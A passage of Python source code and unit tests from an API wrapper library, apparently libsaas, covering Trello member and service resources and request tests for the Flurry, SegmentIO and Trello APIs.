class BoardStar(TrelloResource):
path = 'boardStars'
def get(self, *args, **kwargs):
raise base.MethodNotSupported()
class CustomBoardBackgrounds(TrelloCollection):
path = 'customBoardBackgrounds'
class CustomBoardBackground(TrelloResource):
path = 'customBoardBackgrounds'
class CustomStickers(TrelloCollection):
path = 'customStickers'
class CustomSticker(TrelloResource):
path = 'customStickers'
def update(self, *args, **kwargs):
raise base.MethodNotSupported()
class Boards(TrelloReadonlyCollection, TrelloFilterMixin):
path = 'boards'
class Cards(TrelloReadonlyCollection, TrelloFilterMixin):
path = 'cards'
class Notifications(TrelloReadonlyCollection, TrelloFilterMixin):
path = 'notifications'
class Organizations(TrelloReadonlyCollection, TrelloFilterMixin):
path = 'organizations'
class Sessions(TrelloReadonlyCollection):
path = 'sessions'
class Tokens(TrelloReadonlyCollection):
path = 'tokens'
class Member(TrelloResource, TrelloFieldMixin):
path = 'members'
def delete(self, *args, **kwargs):
raise base.MethodNotSupported()
@base.apimethod
def get(self, **kwargs):
"""
Fetch a single object.
Upstream documentation:
https://trello.com/docs/api/member/index.html
"""
params = base.get_params(None, kwargs, serialize_param=serialize_param)
request = http.Request('GET', self.get_url(), params)
return request, parsers.parse_json
@base.resource(Actions)
def actions(self):
"""
Returns all actions
"""
return Actions(self)
@base.resource(BoardBackgrounds)
def board_backgrounds(self):
"""
Returns all board backgrounds
"""
return BoardBackgrounds(self)
@base.resource(BoardBackgrounds)
def board_background(self, board_background_id):
"""
Returns a single board background
"""
return BoardBackground(self, board_background_id)
@base.resource(BoardStars)
def board_stars(self):
"""
Returns all board stars
"""
return BoardStars(self)
@base.resource(BoardStar)
def board_star(self, board_star_id):
"""
Returns a single board star
"""
return BoardStar(self, board_star_id)
@base.resource(CustomBoardBackgrounds)
def custom_board_backgrounds(self):
"""
Returns all custom board backgrounds
"""
return CustomBoardBackgrounds(self)
@base.resource(CustomBoardBackground)
def custom_board_background(self, board_background_id):
"""
Returns a single custom board background
"""
return CustomBoardBackground(self, board_background_id)
@base.resource(CustomStickers)
def custom_stickers(self):
"""
Returns all custom stickers
"""
return CustomStickers(self)
@base.resource(CustomSticker)
def custom_sticker(self, sticker_id):
"""
Returns a single custom stickers
"""
return CustomSticker(self, sticker_id)
@base.resource(Notifications)
def notifications(self):
"""
Returns all notifications
"""
return Notifications(self)
@base.resource(Organizations)
def organizations(self):
"""
Returns all organizations
"""
return Organizations(self)
@base.resource(Boards)
def boards(self):
"""
Returns all boards
"""
return Boards(self)
@base.resource(Cards)
def cards(self):
"""
Returns all cards
"""
return Cards(self)
@base.resource(Sessions)
def sessions(self):
"""
Returns all sessions
"""
return Sessions(self)
@base.resource(Tokens)
def tokens(self):
"""
Returns all tokens
"""
return Tokens(self)
```
#### File: services/trello/service.py
```python
import json
from libsaas import http
from libsaas.services import base
from .members import Member
from .actions import Action
from .cards import Card, Cards
from .lists import List, Lists
from .boards import Board, Boards
from .notifications import Notification
from .checklists import Checklist, Checklists
from .organizations import Organization, Organizations
class Trello(base.Resource):
"""
"""
def __init__(self, key, token=None):
"""
Create a Trello service.
:var key: Your application key
:vartype key: str
:var token: The authorization token from the user (optional).
:vartype token: str
"""
self.apiroot = 'https://api.trello.com/1'
self.key = key
self.token = token
self.add_filter(self.add_auth)
self.add_filter(self.use_json)
def get_url(self):
return self.apiroot
def add_auth(self, request):
params = {'key': self.key}
if self.token:
params.update({'token': self.token})
if request.method.upper() in http.URLENCODE_METHODS:
request.params.update(params)
else:
request.params = json.dumps(request.params)
request.uri += '?' + http.urlencode_any(params)
def use_json(self, request):
if request.method.upper() not in http.URLENCODE_METHODS:
request.headers['Content-Type'] = 'application/json'
@base.resource(Action)
def action(self, action_id):
"""
Return the resource corresponding to a single action.
"""
return Action(self, action_id)
@base.resource(Boards)
def boards(self):
"""
Return the resource corresponding to all boards
"""
return Boards(self)
@base.resource(Board)
def board(self, board_id):
"""
Return the resource corresponding to a single board
"""
return Board(self, board_id)
@base.resource(Cards)
def cards(self):
"""
Return the resource corresponding to all cards
"""
return Cards(self)
@base.resource(Card)
def card(self, card_id_or_shortlink):
"""
Return the resource corresponding to a single card
"""
return Card(self, card_id_or_shortlink)
@base.resource(Checklists)
def checklists(self):
"""
Return the resource corresponding to all checklists
"""
return Checklists(self)
@base.resource(Checklist)
def checklist(self, checklist_id):
"""
Return the resource corresponding to a single checklist
"""
return Checklist(self, checklist_id)
@base.resource(Lists)
def lists(self):
"""
Return the resource corresponding to all lists
"""
return Lists(self)
@base.resource(List)
def list(self, list_id):
"""
Return the resource corresponding to a single list
"""
return List(self, list_id)
@base.resource(Member)
def me(self):
"""
Return the resource corresponding to the current member
"""
return Member(self, 'me')
@base.resource(Member)
def member(self, member_id_or_username):
"""
Return the resource corresponding to a single member
"""
return Member(self, member_id_or_username)
@base.resource(Notification)
def notification(self, notification_id):
"""
Return the resource corresponding to a single notification
"""
return Notification(self, notification_id)
@base.resource(Organizations)
def organizations(self):
"""
Return the resource corresponding to all organizations
"""
return Organizations(self)
@base.resource(Organization)
def organization(self, organization_id_or_name):
"""
Return the resource corresponding to a single organization
"""
return Organization(self, organization_id_or_name)
```
#### File: libsaas/test/test_flurry.py
```python
import unittest
from libsaas.executors import test_executor
from libsaas.services import flurry
class FlurryTestCase(unittest.TestCase):
def setUp(self):
self.executor = test_executor.use()
self.executor.set_response(b'{}', 200, {})
self.service = flurry.Flurry('my-api-access-code')
def expect(self, uri, params={}):
self.assertEqual('GET', self.executor.request.method)
self.assertEqual(self.executor.request.uri,
'http://api.flurry.com' + uri)
params.update({'apiAccessCode': 'my-api-access-code'})
if params:
self.assertEqual(self.executor.request.params, params)
def test_applications(self):
self.service.applications().get()
self.expect('/appInfo/getAllApplications')
def test_application(self):
self.service.application('my-api-key').get()
self.expect('/appInfo/getApplication', {
'apiKey': 'my-api-key'
})
(self.service.application('my-api-key')
.events().get('start_date', 'end_date'))
self.expect('/eventMetrics/Summary', {
'apiKey': 'my-api-key',
'startDate': 'start_date',
'endDate': 'end_date'
})
(self.service.application('my-api-key')
.event('event_name').get('start_date', 'end_date'))
self.expect('/eventMetrics/Event', {
'apiKey': 'my-api-key',
'eventName': 'event_name',
'startDate': 'start_date',
'endDate': 'end_date'
})
(self.service.application('my-api-key').metrics()
.active_users('start_date', 'end_date'))
self.expect('/appMetrics/ActiveUsers', {
'apiKey': 'my-api-key',
'startDate': 'start_date',
'endDate': 'end_date'
})
(self.service.application('my-api-key').metrics()
.active_users_by_week('start_date', 'end_date'))
self.expect('/appMetrics/ActiveUsersByWeek', {
'apiKey': 'my-api-key',
'startDate': 'start_date',
'endDate': 'end_date'
})
(self.service.application('my-api-key').metrics()
.active_users_by_month('start_date', 'end_date'))
self.expect('/appMetrics/ActiveUsersByMonth', {
'apiKey': 'my-api-key',
'startDate': 'start_date',
'endDate': 'end_date'
})
(self.service.application('my-api-key').metrics()
.new_users('start_date', 'end_date', group_by='WEEKS'))
self.expect('/appMetrics/NewUsers', {
'apiKey': 'my-api-key',
'startDate': 'start_date',
'endDate': 'end_date',
'groupBy': 'WEEKS'
})
(self.service.application('my-api-key').metrics()
.median_session_length('start_date', 'end_date'))
self.expect('/appMetrics/MedianSessionLength', {
'apiKey': 'my-api-key',
'startDate': 'start_date',
'endDate': 'end_date'
})
(self.service.application('my-api-key').metrics()
.avg_session_length('start_date', 'end_date'))
self.expect('/appMetrics/AvgSessionLength', {
'apiKey': 'my-api-key',
'startDate': 'start_date',
'endDate': 'end_date',
})
(self.service.application('my-api-key').metrics()
.sessions('start_date', 'end_date'))
self.expect('/appMetrics/Sessions', {
'apiKey': 'my-api-key',
'startDate': 'start_date',
'endDate': 'end_date'
})
(self.service.application('my-api-key').metrics()
.page_views('start_date', 'end_date', version_name='v1'))
self.expect('/appMetrics/PageViews', {
'apiKey': 'my-api-key',
'startDate': 'start_date',
'endDate': 'end_date',
'versionName': 'v1'
})
(self.service.application('my-api-key').metrics()
.avg_page_views_per_session('start_date', 'end_date'))
self.expect('/appMetrics/AvgPageViewsPerSession', {
'apiKey': 'my-api-key',
'startDate': 'start_date',
'endDate': 'end_date'
})
(self.service.application('my-api-key').metrics()
.retained_users('start_date', 'end_date', 'US'))
self.expect('/appMetrics/RetainedUsers', {
'apiKey': 'my-api-key',
'startDate': 'start_date',
'endDate': 'end_date',
'country': 'US'
})
```
#### File: libsaas/test/test_segmentio.py
```python
import json
import unittest
from libsaas.services import segmentio
from libsaas.executors import test_executor
class SegmentIOTestCase(unittest.TestCase):
def setUp(self):
self.executor = test_executor.use()
self.executor.set_response(b'{}', 200, {})
self.service = segmentio.SegmentIO('my-api-secret')
def expect(self, uri, params):
self.assertEqual('POST', self.executor.request.method)
self.assertEqual(self.executor.request.uri,
'https://api.segment.io/v1' + uri)
params.update({'secret': 'my-api-secret'})
self.assertEqual(json.loads(self.executor.request.params), params)
def test_identify(self):
self.service.user('user_id').identify()
self.expect('/identify', {
'userId': 'user_id',
})
self.service.user('user_id').identify(traits={'foo': 'bar'})
self.expect('/identify', {
'userId': 'user_id',
'traits': {'foo': 'bar'}
})
self.service.user('user_id').identify(
context={'providers':{'all': False}})
self.expect('/identify', {
'userId': 'user_id',
'context': {'providers': {'all': False}}
})
def test_track(self):
self.service.user('user_id').track('new event')
self.expect('/track', {
'userId': 'user_id',
'event': 'new event',
})
self.service.user('user_id').track('new event', properties={'foo': 'bar'})
self.expect('/track', {
'userId': 'user_id',
'properties': {'foo': 'bar'},
'event': 'new event',
})
self.service.user('user_id').track(
'new event', context={'providers':{'all': False}})
self.expect('/track', {
'userId': 'user_id',
'event': 'new event',
'context': {'providers': {'all': False}}
})
def test_alias(self):
self.service.alias('from_user_id', 'to_user_id')
self.expect('/alias', {
'from': 'from_user_id',
'to': 'to_user_id',
})
def test_import(self):
actions = [{'action': 'track'}, {'action': 'identify'}]
context = {'providers': {'all': False}}
self.service.batch_import(actions)
self.expect('/import', {'batch': actions})
self.service.batch_import(actions, context)
self.expect('/import', {'batch': actions,
'context': context})
```
#### File: libsaas/test/test_trello.py
```python
import json
import unittest
from libsaas import http
from libsaas.executors import test_executor
from libsaas.services import trello
class TrelloTestCase(unittest.TestCase):
def setUp(self):
self.executor = test_executor.use()
self.executor.set_response(b'{}', 200, {})
self.service = trello.Trello('my-key','my-token')
def expect(self, method=None, uri=None, params={}):
if method:
self.assertEqual(method, self.executor.request.method)
auth_params = {'key': 'my-key', 'token': '<PASSWORD>'}
if method != 'GET':
uri += '?' + http.urlencode_any(auth_params)
self.assertEqual(
self.executor.request.uri,
'https://api.trello.com/1' + uri)
if method == 'GET':
params.update(auth_params)
if params:
self.assertEqual(self.executor.request.params, params)
def test_actions(self):
self.service.action('1234').get()
self.expect('GET', '/actions/1234', {})
self.service.action('1234').get(fields=['id'])
self.expect('GET', '/actions/1234', {'fields': 'id'})
self.service.action('1234').get(fields=['id', 'name'])
self.expect('GET', '/actions/1234', {'fields': 'id,name'})
self.service.action('1234').get(member=True)
self.expect('GET', '/actions/1234', {'member': 'true'})
self.service.action('1234').field('name')
self.expect('GET', '/actions/1234/name', {})
self.service.action('1234').board().get()
self.expect('GET', '/actions/1234/board', {})
self.service.action('1234').board().get(fields=['id', 'name'])
self.expect('GET', '/actions/1234/board', {'fields': 'id,name'})
self.service.action('1234').board().field('name')
self.expect('GET', '/actions/1234/board/name', {})
self.service.action('1234').card().get()
self.expect('GET', '/actions/1234/card', {})
self.service.action('1234').card().get(fields=['id', 'name'])
self.expect('GET', '/actions/1234/card', {'fields': 'id,name'})
self.service.action('1234').card().field('name')
self.expect('GET', '/actions/1234/card/name', {})
self.service.action('1234').list().get()
self.expect('GET', '/actions/1234/list', {})
self.service.action('1234').list().get(fields=['id', 'name'])
self.expect('GET', '/actions/1234/list', {'fields': 'id,name'})
self.service.action('1234').list().field('name')
self.expect('GET', '/actions/1234/list/name', {})
self.service.action('1234').member().get()
self.expect('GET', '/actions/1234/member', {})
self.service.action('1234').member().get(fields=['id', 'name'])
self.expect('GET', '/actions/1234/member', {'fields': 'id,name'})
self.service.action('1234').member().field('name')
self.expect('GET', '/actions/1234/member/name', {})
self.service.action('1234').creator().get()
self.expect('GET', '/actions/1234/memberCreator', {})
self.service.action('1234').creator().get(fields=['id', 'name'])
self.expect('GET', '/actions/1234/memberCreator', {'fields': 'id,name'})
self.service.action('1234').creator().field('name')
self.expect('GET', '/actions/1234/memberCreator/name', {})
self.service.action('1234').organization().get()
self.expect('GET', '/actions/1234/organization', {})
self.service.action('1234').organization().get(fields=['id', 'name'])
self.expect('GET', '/actions/1234/organization', {'fields': 'id,name'})
self.service.action('1234').organization().field('name')
self.expect('GET', '/actions/1234/organization/name', {})
obj = {'foo': 'bar'}
self.service.action('1234').update(obj)
self.expect('PUT', '/actions/1234', json.dumps(obj))
self.service.action('1234').delete()
self.expect('DELETE', '/actions/1234')
def test_boards(self):
self.service.board('1234').get()
self.expect('GET', '/boards/1234', {})
self.service.board('1234').get(fields=['id'])
self.expect('GET', '/boards/1234', {'fields': 'id'})
self.service.board('1234').get(fields=['id', 'name'])
self.expect('GET', '/boards/1234', {'fields': 'id,name'})
self.service.board('1234').get(action_member=True)
self.expect('GET', '/boards/1234', {'action_member': 'true'})
self.service.board('1234').field('name')
self.expect('GET', '/boards/1234/name', {})
self.service.board('1234').actions().get()
self.expect('GET', '/boards/1234/actions', {})
self.service.board('1234').actions().get(limit=10)
self.expect('GET', '/boards/1234/actions', {'limit': 10})
self.service.board('1234').cards().get()
self.expect('GET', '/boards/1234/cards', {})
self.service.board('1234').cards().get(limit=10)
self.expect('GET', '/boards/1234/cards', {'limit': 10})
self.service.board('1234').cards().filter('open')
self.expect('GET', '/boards/1234/cards/open', {})
self.service.board('1234').card('1234').get()
self.expect('GET', '/boards/1234/cards/1234', {})
self.service.board('1234').card('1234').get(fields=['id'])
self.expect('GET', '/boards/1234/cards/1234', {'fields': 'id'})
self.service.board('1234').checklists().get()
self.expect('GET', '/boards/1234/checklists', {})
self.service.board('1234').checklists().get(limit=10)
self.expect('GET', '/boards/1234/checklists', {'limit': 10})
self.service.board('1234').lists().get()
self.expect('GET', '/boards/1234/lists', {})
self.service.board('1234').lists().get(limit=10)
self.expect('GET', '/boards/1234/lists', {'limit': 10})
self.service.board('1234').lists().filter('open')
self.expect('GET', '/boards/1234/lists/open', {})
self.service.board('1234').members().get()
self.expect('GET', '/boards/1234/members', {})
self.service.board('1234').members().get(limit=10)
self.expect('GET', '/boards/1234/members', {'limit': 10})
self.service.board('1234').members().filter('normal')
self.expect('GET', '/boards/1234/members/normal', {})
self.service.board('1234').members_invited().get()
self.expect('GET', '/boards/1234/membersInvited', {})
self.service.board('1234').members_invited().get(fields=['id'])
self.expect('GET', '/boards/1234/membersInvited', {'fields': 'id'})
self.service.board('1234').memberships().get()
self.expect('GET', '/boards/1234/memberships', {})
self.service.board('1234').memberships().get(limit=10)
self.expect('GET', '/boards/1234/memberships', {'limit': 10})
self.service.board('1234').membership('1234').get()
self.expect('GET', '/boards/1234/memberships/1234', {})
self.service.board('1234').membership('1234').get(fields=['id'])
self.expect('GET', '/boards/1234/memberships/1234', {'fields': 'id'})
self.service.board('1234').organization().get()
self.expect('GET', '/boards/1234/organization', {})
self.service.board('1234').organization().get(fields=['id'])
self.expect('GET', '/boards/1234/organization', {'fields': 'id'})
self.service.board('1234').organization().field('id')
self.expect('GET', '/boards/1234/organization/id', {})
obj = {'foo': 'bar'}
self.service.boards().create(obj)
self.expect('POST', '/boards', json.dumps(obj))
self.service.board('1234').calendar_key()
self.expect('POST', '/boards/1234/calendarKey/generate')
self.service.board('1234').mark_as_viewed()
self.expect('POST', '/boards/1234/markAsViewed')
self.service.board('1234').email_key()
self.expect('POST', '/boards/1234/emailKey/generate')
self.service.board('1234').checklists().create(obj)
self.expect('POST', '/boards/1234/checklists', json.dumps(obj))
self.service.board('1234').lists().create(obj)
self.expect('POST', '/boards/1234/lists', json.dumps(obj))
self.service.board('1234').update(obj)
self.expect('PUT', '/boards/1234', json.dumps(obj))
self.service.board('1234').member('1234').update(obj)
self.expect('PUT', '/boards/1234/members/1234', json.dumps(obj))
self.service.board('1234').membership('1234').update(obj)
self.expect('PUT', '/boards/1234/memberships/1234', json.dumps(obj))
self.service.board('1234').member('1234').delete()
self.expect('DELETE', '/boards/1234/members/1234')
def test_cards(self):
self.service.card('1234').get()
self.expect('GET', '/cards/1234', {})
self.service.card('1234').get(fields=['id'])
self.expect('GET', '/cards/1234', {'fields': 'id'})
self.service.card('1234').get(fields=['id', 'name'])
self.expect('GET', '/cards/1234', {'fields': 'id,name'})
self.service.card('1234').get(attachments=True)
self.expect('GET', '/cards/1234', {'attachments': 'true'})
self.service.card('1234').field('name')
self.expect('GET', '/cards/1234/name', {})
self.service.card('1234').actions().get()
self.expect('GET', '/cards/1234/actions', {})
self.service.card('1234').actions().get(limit=10)
self.expect('GET', '/cards/1234/actions', {'limit': 10})
self.service.card('1234').attachments().get()
self.expect('GET', '/cards/1234/attachments', {})
self.service.card('1234').attachments().get(limit=10)
self.expect('GET', '/cards/1234/attachments', {'limit': 10})
self.service.card('1234').attachment('1234').get()
self.expect('GET', '/cards/1234/attachments/1234', {})
self.service.card('1234').attachment('1234').get(fields=['id'])
self.expect('GET', '/cards/1234/attachments/1234', {'fields': 'id'})
self.service.card('1234').board().get()
self.expect('GET', '/cards/1234/board', {})
self.service.card('1234').board().get(fields=['id', 'name'])
self.expect('GET', '/cards/1234/board', {'fields': 'id,name'})
self.service.card('1234').board().field('name')
self.expect('GET', '/cards/1234/board/name', {})
self.service.card('1234').checkitem_states().get()
self.expect('GET', '/cards/1234/checkItemStates', {})
self.service.card('1234').checkitem_states().get(limit=10)
self.expect('GET', '/cards/1234/checkItemStates', {'limit': 10})
self.service.card('1234').checklists().get()
self.expect('GET', '/cards/1234/checklists', {})
self.service.card('1234').checklists().get(limit=10)
self.expect('GET', '/cards/1234/checklists', {'limit': 10})
self.service.card('1234').list().get()
self.expect('GET', '/cards/1234/list', {})
self.service.card('1234').list().get(fields=['id', 'name'])
self.expect('GET', '/cards/1234/list', {'fields': 'id,name'})
self.service.card('1234').list().field('name')
self.expect('GET', '/cards/1234/list/name', {})
self.service.card('1234').members().get()
self.expect('GET', '/cards/1234/members', {})
self.service.card('1234').members().get(limit=10)
self.expect('GET', '/cards/1234/members', {'limit': 10})
self.service.card('1234').members_voted().get()
self.expect('GET', '/cards/1234/membersVoted', {})
self.service.card('1234').members_voted().get(fields=['id'])
self.expect('GET', '/cards/1234/membersVoted', {'fields': 'id'})
self.service.card('1234').stickers().get()
self.expect('GET', '/cards/1234/stickers', {})
self.service.card('1234').stickers().get(limit=10)
self.expect('GET', '/cards/1234/stickers', {'limit': 10})
self.service.card('1234').sticker('1234').get()
self.expect('GET', '/cards/1234/stickers/1234', {})
self.service.card('1234').sticker('1234').get(fields=['id'])
self.expect('GET', '/cards/1234/stickers/1234', {'fields': 'id'})
obj = {'foo': 'bar'}
self.service.cards().create(obj)
self.expect('POST', '/cards', json.dumps(obj))
self.service.card('1234').actions().comments().create(obj)
self.expect('POST', '/cards/1234/actions/comments', json.dumps(obj))
self.service.card('1234').attachments().create(obj)
self.expect('POST', '/cards/1234/attachments', json.dumps(obj))
self.service.card('1234').checklists().create(obj)
self.expect('POST', '/cards/1234/checklists', json.dumps(obj))
self.service.card('1').checklist('2').checkitems().create(obj)
self.expect('POST', '/cards/1/checklist/2/checkItem', json.dumps(obj))
self.service.card('1').checklist('2').checkitem('3').convert_to_card()
self.expect(
'POST', '/cards/1/checklist/2/checkItem/3/convertToCard',
json.dumps({}))
self.service.card('1234').labels().create(obj)
self.expect('POST', '/cards/1234/labels', json.dumps(obj))
self.service.card('1234').members_voted().create(obj)
self.expect('POST', '/cards/1234/membersVoted', json.dumps(obj))
self.service.card('1234').update(obj)
self.expect('PUT', '/cards/1234', json.dumps(obj))
self.service.card('1234').actions().comments().update(obj)
self.expect('PUT', '/cards/1234/actions/comments', json.dumps(obj))
self.service.card('1').checklist('2').checkitem('3').update(obj)
self.expect('PUT', '/cards/1/checklist/2/checkItem/3', json.dumps(obj))
self.service.card('1').sticker('2').update(obj)
self.expect('PUT', '/cards/1/stickers/2', json.dumps(obj))
self.service.card('1').attachment('2').delete()
self.expect('DELETE', '/cards/1/attachments/2')
self.service.card('1234').actions().comments().delete()
self.expect('DELETE', '/cards/1234/actions/comments')
self.service.card('1').checklist('2').checkitem('3').delete()
self.expect('DELETE', '/cards/1/checklist/2/checkItem/3')
self.service.card('1').sticker('2').delete()
self.expect('DELETE', '/cards/1/stickers/2')
self.service.card('1').label('2').delete()
self.expect('DELETE', '/cards/1/labels/2')
def test_checklists(self):
self.service.checklist('1234').get()
self.expect('GET', '/checklists/1234', {})
self.service.checklist('1234').get(fields=['id'])
self.expect('GET', '/checklists/1234', {'fields': 'id'})
self.service.checklist('1234').get(fields=['id', 'name'])
self.expect('GET', '/checklists/1234', {'fields': 'id,name'})
self.service.checklist('1234').get(member=True)
self.expect('GET', '/checklists/1234', {'member': 'true'})
self.service.checklist('1234').field('name')
self.expect('GET', '/checklists/1234/name', {})
self.service.checklist('1234').board().get()
self.expect('GET', '/checklists/1234/board', {})
self.service.checklist('1234').board().get(fields=['id', 'name'])
self.expect('GET', '/checklists/1234/board', {'fields': 'id,name'})
self.service.checklist('1234').board().field('name')
self.expect('GET', '/checklists/1234/board/name', {})
self.service.checklist('1234').cards().get()
self.expect('GET', '/checklists/1234/cards', {})
self.service.checklist('1234').cards().get(limit=10)
self.expect('GET', '/checklists/1234/cards', {'limit': 10})
self.service.checklist('1234').cards().filter('closed')
self.expect('GET', '/checklists/1234/cards/closed', {})
self.service.checklist('1234').checkitems().get()
self.expect('GET', '/checklists/1234/checkItems', {})
self.service.checklist('1234').checkitems().get(limit=10)
self.expect('GET', '/checklists/1234/checkItems', {'limit': 10})
self.service.checklist('1234').checkitem('1234').get()
self.expect('GET', '/checklists/1234/checkItems/1234', {})
self.service.checklist('1234').checkitem('1234').get(fields=['id'])
self.expect('GET', '/checklists/1234/checkItems/1234', {'fields': 'id'})
obj = {'foo': 'bar'}
self.service.checklists().create(obj)
self.expect('POST', '/checklists', json.dumps(obj))
self.service.checklist('1234').checkitems().create(obj)
self.expect('POST', '/checklists/1234/checkItems', json.dumps(obj))
self.service.checklist('1234').update(obj)
self.expect('PUT', '/checklists/1234', json.dumps(obj))
self.service.checklist('1234').delete()
self.expect('DELETE', '/checklists/1234')
def test_lists(self):
self.service.list('1234').get()
self.expect('GET', '/lists/1234', {})
self.service.list('1234').get(fields=['id'])
self.expect('GET', '/lists/1234', {'fields': 'id'})
self.service.list('1234').get(fields=['id', 'name'])
self.expect('GET', '/lists/1234', {'fields': 'id,name'})
self.service.list('1234').get(member=True)
self.expect('GET', '/lists/1234', {'member': 'true'})
self.service.list('1234').field('name')
self.expect('GET', '/lists/1234/name', {})
self.service.list('1234').actions().get()
self.expect('GET', '/lists/1234/actions', {})
self.service.list('1234').actions().get(limit=10)
self.expect('GET', '/lists/1234/actions', {'limit': 10})
self.service.list('1234').board().get()
self.expect('GET', '/lists/1234/board', {})
self.service.list('1234').board().get(fields=['id', 'name'])
self.expect('GET', '/lists/1234/board', {'fields': 'id,name'})
self.service.list('1234').board().field('name')
self.expect('GET', '/lists/1234/board/name', {})
self.service.list('1234').cards().get()
self.expect('GET', '/lists/1234/cards', {})
self.service.list('1234').cards().get(limit=10)
self.expect('GET', '/lists/1234/cards', {'limit': 10})
self.service.list('1234').cards().filter('closed')
self.expect('GET', '/lists/1234/cards/closed', {})
obj = {'foo': 'bar'}
self.service.lists().create(obj)
self.expect('POST', '/lists', json.dumps(obj))
self.service.list('1234').archive_all_cards()
self.expect('POST', '/lists/1234/archiveAllCards')
self.service.list('1234').update(obj)
self.expect('PUT', '/lists/1234', json.dumps(obj))
def test_members(self):
self.service.member('1234').get()
self.expect('GET', '/members/1234', {})
self.service.member('1234').get(fields=['id'])
self.expect('GET', '/members/1234', {'fields': 'id'})
self.service.member('1234').get(fields=['id', 'name'])
self.expect('GET', '/members/1234', {'fields': 'id,name'})
self.service.member('1234').get(member=True)
self.expect('GET', '/members/1234', {'member': 'true'})
self.service.member('1234').field('name')
self.expect('GET', '/members/1234/name', {})
self.service.member('1234').actions().get()
self.expect('GET', '/members/1234/actions', {})
self.service.member('1234').actions().get(limit=10)
self.expect('GET', '/members/1234/actions', {'limit': 10})
self.service.member('1234').board_backgrounds().get()
self.expect('GET', '/members/1234/boardBackgrounds', {})
self.service.member('1234').board_backgrounds().get(limit=10)
self.expect('GET', '/members/1234/boardBackgrounds', {'limit': 10})
self.service.member('1234').board_background('1234').get()
self.expect('GET', '/members/1234/boardBackgrounds/1234', {})
self.service.member('1').board_background('2').get(fields=['id'])
self.expect('GET', '/members/1/boardBackgrounds/2', {'fields': 'id'})
self.service.member('1234').board_stars().get()
self.expect('GET', '/members/1234/boardStars', {})
self.service.member('1234').boards().get()
self.expect('GET', '/members/1234/boards', {})
self.service.member('1234').boards().get(fields=['id', 'name'])
self.expect('GET', '/members/1234/boards', {'fields': 'id,name'})
self.service.member('1234').boards().filter('closed')
self.expect('GET', '/members/1234/boards/closed', {})
self.service.member('1234').cards().get()
self.expect('GET', '/members/1234/cards', {})
self.service.member('1234').cards().get(limit=10)
self.expect('GET', '/members/1234/cards', {'limit': 10})
self.service.member('1234').cards().filter('closed')
self.expect('GET', '/members/1234/cards/closed', {})
self.service.member('1234').custom_board_backgrounds().get()
self.expect('GET', '/members/1234/customBoardBackgrounds', {})
self.service.member('1').custom_board_backgrounds().get(limit=10)
self.expect('GET', '/members/1/customBoardBackgrounds', {'limit': 10})
self.service.member('1234').custom_board_background('1234').get()
self.expect('GET', '/members/1234/customBoardBackgrounds/1234', {})
self.service.member('1').custom_board_background('2').get(
fields=['id'])
self.expect('GET', '/members/1/customBoardBackgrounds/2',
{'fields': 'id'})
self.service.member('1234').custom_stickers().get()
self.expect('GET', '/members/1234/customStickers', {})
self.service.member('1234').custom_stickers().get(limit=10)
self.expect('GET', '/members/1234/customStickers', {'limit': 10})
self.service.member('1234').custom_sticker('1234').get()
self.expect('GET', '/members/1234/customStickers/1234', {})
self.service.member('1').custom_sticker('2').get(fields=['id'])
self.expect('GET', '/members/1/customStickers/2', {'fields': 'id'})
self.service.member('1234').notifications().get()
self.expect('GET', '/members/1234/notifications', {})
self.service.member('1234').notifications().get(limit=10)
self.expect('GET', '/members/1234/notifications', {'limit': 10})
self.service.member('1234').notifications().filter('closed')
self.expect('GET', '/members/1234/notifications/closed', {})
self.service.member('1234').organizations().get()
self.expect('GET', '/members/1234/organizations', {})
self.service.member('1234').organizations().get(limit=10)
self.expect('GET', '/members/1234/organizations', {'limit': 10})
self.service.member('1234').organizations().filter('closed')
self.expect('GET', '/members/1234/organizations/closed', {})
self.service.member('1234').tokens().get()
self.expect('GET', '/members/1234/tokens', {})
self.service.member('1234').tokens().get(limit=10)
self.expect('GET', '/members/1234/tokens', {'limit': 10})
self.service.member('1234').sessions().get()
self.expect('GET', '/members/1234/sessions', {})
self.service.member('1234').sessions().get(limit=10)
self.expect('GET', '/members/1234/sessions', {'limit': 10})
obj = {'foo': 'bar'}
self.service.member('1').board_backgrounds().create(obj)
self.expect('POST', '/members/1/boardBackgrounds', json.dumps(obj))
self.service.member('1').custom_board_backgrounds().create(obj)
self.expect('POST', '/members/1/customBoardBackgrounds',
json.dumps(obj))
self.service.member('1').board_stars().create(obj)
self.expect('POST', '/members/1/boardStars', json.dumps(obj))
self.service.member('1').custom_stickers().create(obj)
self.expect('POST', '/members/1/customStickers', json.dumps(obj))
self.service.member('1234').update(obj)
self.expect('PUT', '/members/1234', json.dumps(obj))
self.service.member('1').board_background('2').update(obj)
self.expect('PUT', '/members/1/boardBackgrounds/2', json.dumps(obj))
self.service.member('1').custom_board_background('2').update(obj)
self.expect('PUT', '/members/1/customBoardBackgrounds/2',
json.dumps(obj))
self.service.member('1').board_star('2').update(obj)
self.expect('PUT', '/members/1/boardStars/2', json.dumps(obj))
self.service.member('1').board_background('2').delete()
self.expect('DELETE', '/members/1/boardBackgrounds/2')
self.service.member('1').custom_board_background('2').delete()
self.expect('DELETE', '/members/1/customBoardBackgrounds/2')
self.service.member('1').board_star('2').delete()
self.expect('DELETE', '/members/1/boardStars/2')
def test_notifications(self):
self.service.notification('1234').get()
self.expect('GET', '/notifications/1234', {})
self.service.notification('1234').get(fields=['id'])
self.expect('GET', '/notifications/1234', {'fields': 'id'})
self.service.notification('1234').get(fields=['id', 'name'])
self.expect('GET', '/notifications/1234', {'fields': 'id,name'})
self.service.notification('1234').get(member=True)
self.expect('GET', '/notifications/1234', {'member': 'true'})
self.service.notification('1234').field('name')
self.expect('GET', '/notifications/1234/name', {})
self.service.notification('1234').board().get()
self.expect('GET', '/notifications/1234/board', {})
self.service.notification('1234').board().get(fields=['id', 'name'])
self.expect('GET', '/notifications/1234/board', {'fields': 'id,name'})
self.service.notification('1234').board().field('name')
self.expect('GET', '/notifications/1234/board/name', {})
self.service.notification('1234').card().get()
self.expect('GET', '/notifications/1234/card', {})
self.service.notification('1234').card().get(fields=['id', 'name'])
self.expect('GET', '/notifications/1234/card', {'fields': 'id,name'})
self.service.notification('1234').card().field('name')
self.expect('GET', '/notifications/1234/card/name', {})
self.service.notification('1234').list().get()
self.expect('GET', '/notifications/1234/list', {})
self.service.notification('1234').list().get(fields=['id', 'name'])
self.expect('GET', '/notifications/1234/list', {'fields': 'id,name'})
self.service.notification('1234').list().field('name')
self.expect('GET', '/notifications/1234/list/name', {})
self.service.notification('1234').member().get()
self.expect('GET', '/notifications/1234/member', {})
self.service.notification('1234').member().get(fields=['id', 'name'])
